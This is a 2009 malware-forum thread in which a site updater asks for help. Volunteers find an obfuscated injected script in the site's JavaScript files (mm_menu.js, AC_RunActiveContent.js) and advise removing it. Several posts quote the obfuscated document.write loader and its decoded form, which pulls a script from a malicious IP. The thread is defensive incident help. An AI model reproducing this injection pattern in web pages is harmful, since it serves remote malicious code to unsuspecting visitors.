Author Topic: haakwine.com compromised  (Read 29924 times)

0 Members and 1 Guest are viewing this topic.

April 16, 2009, 12:32:59 pm
Read 29924 times

gabbafam

  • Newbie

  • Offline
  • *

  • 2
Hi, I am a novice user that is having the malicious site 94.247.2.195 blocked every time i access one website www.haakwine.com.  I did a yahoo search on the 94.247.2.195 and found this malware domain list and forum.  I don't know if you are the right person to post a reply to but I am really wanting to find out how to clean this off this website because i am the website updater and don't know why it is doing this.  Can you offer any help whatsoever?  I would be greatly indebted to you.
I think you could be right :( ..... the following is the uncompressed output from the PDF;

/edit

MysteryFCM: Disabled link and removed code from quoted post. Split and moved to compromised servers forum

April 16, 2009, 12:39:32 pm
Reply #1

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
I've checked the site you referenced and cannot find anything suspicious. Is this the site you are having difficulty with?

/edit

Nevermind, found it. The code is at the bottom of mm_menu.js (disable this file or replace it with a clean copy);

Code: [Select]
document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
This decodes to;

Code: [Select]
<script src=//94.247.2.195/jquery.js></script>
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

April 16, 2009, 12:43:36 pm
Reply #2

GmG

  • Special Members
  • Full Member

  • Offline
  • *

  • 92
There's malware script on mm_menu.js

Code: [Select]
<!--
document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
 -->

April 16, 2009, 12:45:27 pm
Reply #3

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
heh yep, updated my post whilst you were posting ....
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

April 16, 2009, 12:47:25 pm
Reply #4

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Script is also present in;

http://www.haakwine.com/Scripts/AC_RunActiveContent.js
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

April 16, 2009, 01:11:28 pm
Reply #5

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

April 16, 2009, 03:03:39 pm
Reply #6

gabbafam

  • Newbie

  • Offline
  • *

  • 2
I wished I knew all you all know on this forum.  I am sure this is a stupid question for you but "how do you disable a file?"  Thank you so much.

April 16, 2009, 03:13:31 pm
Reply #7

RS-232

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 165
By "disable",it simply means removing the code posted above from the html/php files where it is present...

Quote
document.write(unescape('sV%3CuhIscAHriLSkpt%20LSksLSkrcJaN%3DuhI%2FLSk%2FZt9CgA4uhI%2E2uhI47uhI%2EAH2%2E195%2FjuhIqJaNuuhIerZty%2EjuhIs%3ELSk%3C%2FsVscripLSktuhI%3E').replace(/uhI|Zt|LSk|AH|sV|CgA|JaN/g,""));
Only for the "fun" of it...rs-232 aka sowhat-x aka younameit ;-)
http://www.youtube.com/watch?v=fADjY97_KTw

April 16, 2009, 11:11:18 pm
Reply #8

RS-232

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 165
Only for the "fun" of it...rs-232 aka sowhat-x aka younameit ;-)
http://www.youtube.com/watch?v=fADjY97_KTw